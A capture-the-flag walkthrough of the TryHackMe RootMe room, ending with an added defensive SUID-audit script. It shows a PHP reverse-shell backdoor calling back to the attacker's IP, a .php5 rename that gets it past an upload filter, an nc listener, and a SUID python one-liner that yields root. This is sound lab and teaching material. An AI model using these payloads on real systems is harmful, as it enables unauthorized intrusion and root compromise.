RootMe is a bite-sized web upload form and Linux privilege escalation exercise.

Task 1 Deploy the machine
In this task we start the target VM and connect to the TryHackMe VPN. Alternatively we can use the AttackBox.
Task 2 Reconnaissance
Running nmap shows the open ports, which lets us answer the first three questions as well.
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
After visiting the target VM’s IP address we won’t see anything interesting on the web server.
The next tool in our toolset is gobuster, which we use to look for hidden files and directories.
/.html (Status: 403) [Size: 274]
/uploads (Status: 301) [Size: 308] [--> http://10.10.3.2/uploads/]
/css (Status: 301) [Size: 304] [--> http://10.10.3.2/css/]
/js (Status: 301) [Size: 303] [--> http://10.10.3.2/js/]
/panel (Status: 301) [Size: 306] [--> http://10.10.3.2/panel/]
/.php (Status: 403) [Size: 274]
/.html (Status: 403) [Size: 274]
/server-status (Status: 403) [Size: 274]
Bingo! We can see an upload form on the /panel/ URL and we can list the uploads at the /uploads/ URL.
We can answer the rest of the questions.
Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.29
What service is running on port 22?
ssh
Find directories on the web server using the GoBuster tool.
What is the hidden directory?
/panel/
Task 3 Getting a shell
We have a web upload form, and we can see the uploads as well. Theoretically we can prepare a PHP file that opens a reverse shell to our hacking machine.
Let’s prepare a basic PHP backdoor!
<?php
$sock=fsockopen("<hacking machine tun0 IP>",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
?>
Now we have to upload it to the web server.
Unfortunately we run into an issue: we cannot upload PHP files. Let’s pull the easiest and fastest trick out of our hat to get around this: rename the file to backdoor.php5!
It worked: the backdoor is now visible in the /uploads/ directory from a web browser.
Before we run the backdoor, let’s prepare the listener on our hacking machine! A simple nc will do.
nc -vnlp 4242
If we have done everything correctly, we can look around and find the user.txt flag!
If we don’t find it right away, then:
find / -name "user.txt" 2>/dev/null
Task 4 Privilege escalation
For privilege escalation, as the first question suggests, we have to look for SUID binaries. Let’s run a simple find and look for something interesting!
find / -perm -4000 -print 2>/dev/null
Search for files with SUID permission, which file is weird?
/usr/bin/python
Find a form to escalate your privileges.
Python can spawn a shell, and we can check GTFOBins for the technique. The following command will drop us into a privileged shell.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Let’s check it!
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
Now we can look around and find the root flag!
find / -name "root.txt" 2>/dev/null
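Seen from the defender's side, the same find predicate can drive a recurring audit that would have flagged /usr/bin/python before anyone abused it. The script below is an added example, not part of the original write-up or the room: the function name suid_audit, the baseline file format (one absolute path per line) and the interpreter name list are assumptions made for this sketch.

```shell
#!/bin/sh
# Added example (not from the write-up): audit SUID files under a directory.
# Assumptions: the function name suid_audit, the baseline format (one absolute
# path per line) and the interpreter name list are chosen for this sketch.

# suid_audit ROOT BASELINE
#   CRITICAL  SUID bit on a script interpreter (reported even if baselined)
#   WARN      SUID file that the baseline does not list
suid_audit() (
    root=$1
    baseline=$2
    [ -d "$root" ] && [ -r "$baseline" ] || {
        echo "usage: suid_audit ROOT BASELINE" >&2
        exit 2    # the function body is a subshell, so this ends only the call
    }
    # Same predicate as the write-up's find, restricted to regular files on
    # one filesystem; sorted so reports are stable between runs.
    find "$root" -xdev -type f -perm -4000 -print 2>/dev/null | LC_ALL=C sort |
    while IFS= read -r path; do
        name=${path##*/}
        case $name in
            python|python[0-9]*|perl|perl[0-9]*|ruby|php|php[0-9]*|node|lua|sh|bash|dash|zsh|ksh)
                # An interpreter runs caller-supplied code with the owner's
                # effective UID, so a baseline entry does not excuse it.
                printf 'CRITICAL suid-interpreter %s\n' "$path"
                ;;
            *)
                # -F fixed string, -x whole line: exact path match only.
                grep -Fxq -- "$path" "$baseline" ||
                    printf 'WARN not-in-baseline %s\n' "$path"
                ;;
        esac
    done
)
```

On a real host the baseline would be generated from a known-good install of the same distribution release, and any CRITICAL line is fixed by removing the bit with chmod u-s on the reported file.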